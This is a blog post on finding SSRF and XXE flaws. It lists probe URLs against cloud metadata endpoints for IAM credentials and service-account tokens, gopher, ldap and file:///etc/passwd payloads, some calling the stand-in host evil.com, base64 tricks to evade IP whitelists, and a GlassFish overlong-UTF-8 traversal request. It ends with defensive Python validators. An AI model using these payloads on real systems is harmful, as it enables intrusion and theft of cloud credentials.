XXE+SSRF INJECTION

Blog admin, July 19, 2020

Background
1. Google Dorking is one of the most important reconnaissance tools, and sometimes it leads to bigger results, up to remote code execution or XXE injection. Let’s check how it gathers the information and leads to XXE injection.

Suppose we are testing a PHP application and we want to see how many URLs or endpoints it exposes. We can use Google Dorking for this, and one of the finest examples has been given by the pentest-tools website.

Let’s talk about Google Dorking:


site:https://www.example.com/ ext:asp

The extension can be anything, such as php or jsp pages. If the results come back like this:

https://www.example.com/example/shore.aspx?url=

Then we can frame our own URL like this:

https://www.example.com/example/shore.aspx?next_url=https://www.example.com/example/shore.aspx?redirect_uri=https://www.example.com/example/shore.aspx?next=

These are all redirection parameters, and if the application follows them to other sites, there is a greater chance that XXE injection will be possible.

We can query the AWS instance metadata service:

http://169.254.169.254/latest/meta-data/hostname

and the response can look like this:

Response: ec2-203-0-113-25.compute-1.amazonaws.com

2. Sometimes you will find links that can be used to pivot into internal networks. This becomes possible by finding endpoints, which is why information gathering is so important. Collect the endpoints and try different parameters; sometimes a different combination will work. One of the finest examples I can show you:

http://pinestreet.com/proxy?redacted=newdomain&p=/jsonpfile.jsonp?token=e23sds2dsdsds220mlsslka02

In the above example, the “p” parameter was vulnerable. We tried pointing it at an external source such as http://google.com or http://www.yahoo.com, and the good scenario is that it redirected to the other site. Then let’s try to access internal resources:

1st scenario:

http://pinestreet.com/proxy?redacted=newdomain&p=http://google.com?token=e23sds2dsdsds220mlsslka02

2nd scenario:


http://pinestreet.com/proxy?redacted=newdomain&p=http://www.yahoo.com?token=e23sds2dsdsds220mlsslka02

3rd scenario:

http://pinestreet.com/proxy?redacted=newdomain&p=ftp:///etc/passwd?token=e23sds2dsdsds220mlsslka02


3. AWS and Google Cloud instance metadata URLs that can be used as parameter values for pivoting into the internal network; this applies to the redirection parameters explained in steps 1 and 2:

http://169.254.169.254/latest/user-data/

http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE

http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance

http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token

http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json

4. Test cases for different protocols such as sftp, gopher, ftp, ldap, http, dict and file:

http://protocolexample.com/example.php?url=ldap://localhost:1337/%0astats%0aquit

http://protocolexample.com/example.php?url=ldaps://localhost:1337/%0astats%0aquit

http://protocolexample.com/example.php?url=ldapi://localhost:1337/%0astats%0aquit

http://protocolexample.com/example.php?url=sftp://evil.com:1337/

http://protocolexample.com/example.php?url=dict://evil.com:1337/

http://protocolexample.com/example.php?url=file:///etc/passwd

http://protocolexample.com/example.php?url=file:///C:/Windows/win.ini

http://protocolexample.com/example.php?url=tftp://evil.com:1337/testpacket

http://protocolexample.com/example.php?url=gopher://localhost:1337/%0astats%0aquit

5. For XXE injection or the SSRF technique, using a base64-encoded scheme or another encoding can help bypass IP whitelisting.

Suppose we take this example: http://www.example.com:9999/proxy.php?url=aHR0cDovL3d3dsdwwsWXSdssdsWcy5jb20vc2l0ZS9jb250ZW50L3BhY21hbg==

So, for any URL parameter whose value after url= is a base64-encoded scheme, we can encode http://127.0.0.1:8080 to its base64 value aHR0cDovLzEyNy4wLjAuMTo4MDgw

Try with different ports like:

http://127.0.0.1:443

http://127.0.0.1:22

http://127.0.0.1:25

http://127.0.0.1:21

and make sure each one is converted into the base64-encoded scheme or whichever other encoding the parameter uses.
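The probes in steps 1 to 5 (redirect and proxy parameters, cloud metadata addresses, non-HTTP schemes, base64-encoded values) are exactly the cases a server-side guard on such a parameter has to refuse. The Python below is an added example written for this page; it is not code from the original post or from any product. The allowlisted host names, the FAKE_DNS table and the query strings are constructed stand-ins. It decodes a parameter value (plain or base64), allows only http(s) to allowlisted names, refuses IP literals and metadata host names, checks the resolved addresses against internal ranges, and then reuses the same policy to audit logged query strings.

```python
import base64
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical policy for a proxy/redirect parameter: only these names may be fetched.
ALLOWED_HOSTS = {"cdn.example.com", "api.example.com", "partner.example.net"}
ALLOWED_SCHEMES = {"http", "https"}

# Names that are never a valid proxy target, whatever the allowlist says.
BLOCKED_NAMES = {"localhost", "metadata", "metadata.google.internal"}

# Address ranges an outbound fetch must never reach. 169.254.0.0/16 is link-local and
# contains 169.254.169.254, the AWS/GCP instance metadata endpoint used in steps 1 and 3.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]

# Constructed stand-in for DNS so the example runs offline. partner.example.net is
# allowlisted by name but resolves to an internal address, which must still be refused.
FAKE_DNS = {
    "cdn.example.com": ["203.0.113.10"],
    "api.example.com": ["203.0.113.20"],
    "partner.example.net": ["10.0.0.5"],
}

URL_SHAPE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")  # value starts with "scheme:"


def decode_param(value: str) -> str:
    """Return the URL carried by a parameter, undoing base64 when that is how it was passed (step 5)."""
    if URL_SHAPE.match(value):
        return value
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return value


def is_blocked_address(addr: str) -> bool:
    """True when an IP address falls in a loopback, link-local, private or CGNAT range."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # ::ffff:169.254.169.254 is still the metadata address
    return any(ip in net for net in BLOCKED_NETWORKS)


def validate_outbound_url(raw: str, resolver=FAKE_DNS.get):
    """Decide whether a parameter value may be fetched. Returns (allowed, reason)."""
    url = decode_param(raw)
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower().rstrip(".")
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:  # file:, gopher:, ldap:, ftp:, dict: (step 4)
        return False, f"scheme not allowed: {parts.scheme or '(none)'}"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"
    if not host or host in BLOCKED_NAMES or host.endswith(".internal"):
        return False, f"blocked host name: {host or '(empty)'}"
    try:
        ipaddress.ip_address(host)
        return False, f"IP literal not allowed: {host}"  # 127.0.0.1, 169.254.169.254, [::1]
    except ValueError:
        pass
    if host not in ALLOWED_HOSTS:
        return False, f"host not in allowlist: {host}"
    addrs = resolver(host) or []
    if not addrs:
        return False, f"host does not resolve: {host}"
    for addr in addrs:
        if is_blocked_address(addr):
            return False, f"{host} resolves to internal address {addr}"
    return True, "ok"


def audit_query_string(query: str):
    """Detection view: run the same policy over every URL-shaped value in a logged query string."""
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if URL_SHAPE.match(decode_param(value)):
                allowed, reason = validate_outbound_url(value)
                if not allowed:
                    findings.append((name, reason))
    return findings


if __name__ == "__main__":
    # Constructed query strings in the shape of the probes shown in steps 2, 4 and 5.
    for q in ("redacted=newdomain&p=ftp:///etc/passwd?token=x",
              "url=gopher://localhost:1337/%0astats%0aquit",
              "url=aHR0cDovLzEyNy4wLjAuMTo4MDgw",
              "url=https://cdn.example.com/logo.png"):
        print(q, "->", audit_query_string(q) or "clean")
```

Two points of design matter in practice. The resolved-address check is what defeats a public name that points at an internal address, but it only holds if the HTTP client then connects to the address that was validated rather than resolving the name a second time. The client must also not follow redirects on its own, since a permitted host can answer with a Location header pointing at the metadata service; either disable redirects or run each hop back through validate_outbound_url.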

6. Sometimes you come across scenarios where nothing works: different protocols and ports have all been tried. Frustration grows when the various scenarios do not play out properly even after the security researcher has tried every encoding scheme.

But one thing always comes to mind: do more information gathering and more source-code review from the browser’s view-source console, and check which frameworks they are using. One security researcher had already published his finding on a CMS framework vulnerability where the target was running Oracle’s GlassFish server. He started searching exploit-db and found something good: the exploit at “https://www.exploit-db.com/exploits/39241/”, which he pasted into the URL below:

https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://127.0.0.1:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

He was able to successfully read the passwd contents.

In every case, it is necessary to review the source code and find out what type of CMS they are using.
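The request in step 6 works because the target decoded %c0%ae, an overlong UTF-8 encoding of “.”, into a dot, so %c0%ae%c0%ae became a “..” traversal segment that a strict decoder would have rejected. The Python below is an added example for this page (not the author’s code and not GlassFish’s) showing the check a server or reverse proxy should apply to a request path: percent-decode once, decode as strict UTF-8, normalise, and confine the result to a base directory. It also includes a scanner for overlong lead bytes that can be run over logged request paths. The base directory /theme/ and the sample paths are assumed values.

```python
import posixpath
from urllib.parse import unquote_to_bytes


def find_overlong_utf8(data: bytes):
    """Return offsets of overlong UTF-8 lead bytes, i.e. encodings longer than the code point needs.
    C0 AE is the classic overlong form of '.', which a lenient decoder turns into '..' traversal."""
    hits = []
    for i, b in enumerate(data):
        nxt = data[i + 1] if i + 1 < len(data) else 0x80
        if b in (0xC0, 0xC1):            # 2-byte form for code points below 0x80 (ASCII)
            hits.append(i)
        elif b == 0xE0 and nxt < 0xA0:   # 3-byte form for code points below 0x800
            hits.append(i)
        elif b == 0xF0 and nxt < 0x90:   # 4-byte form for code points below 0x10000
            hits.append(i)
    return hits


def canonical_path(raw_path: str, base: str = "/theme/"):
    """Percent-decode exactly once, decode as strict UTF-8, normalise, and require the result
    to stay under `base` (assumed directory). Returns (path, "ok") or (None, reason)."""
    data = unquote_to_bytes(raw_path)
    try:
        text = data.decode("utf-8")      # strict: overlong C0 AE raises instead of becoming '.'
    except UnicodeDecodeError as exc:
        return None, f"invalid UTF-8 at byte {exc.start}"
    if "\x00" in text:
        return None, "NUL byte in path"
    if ".." in text.split("/"):
        return None, "traversal segment"
    norm = posixpath.normpath("/" + text.lstrip("/"))
    if not norm.startswith(base):
        return None, f"outside {base}"
    return norm, "ok"


if __name__ == "__main__":
    # Constructed request paths in the shape of the step 6 request and of ordinary traffic.
    for p in ("/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
              "/theme/META-INF/../../etc/passwd",
              "/theme/META-INF/caf%C3%A9.css",
              "/etc/passwd"):
        print(p, "->", canonical_path(p))
        print("  overlong lead bytes at:", find_overlong_utf8(unquote_to_bytes(p)))
```

The check decodes a single time on purpose: a doubly encoded path such as %25c0%25ae comes back from canonical_path still containing the literal text %c0%ae, which is only harmless as long as nothing downstream decodes it again. Apply the check at the last component that touches the filesystem, or make sure every layer in front of it (proxy, servlet container, application) agrees on exactly one decoding step.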

Written by: admin
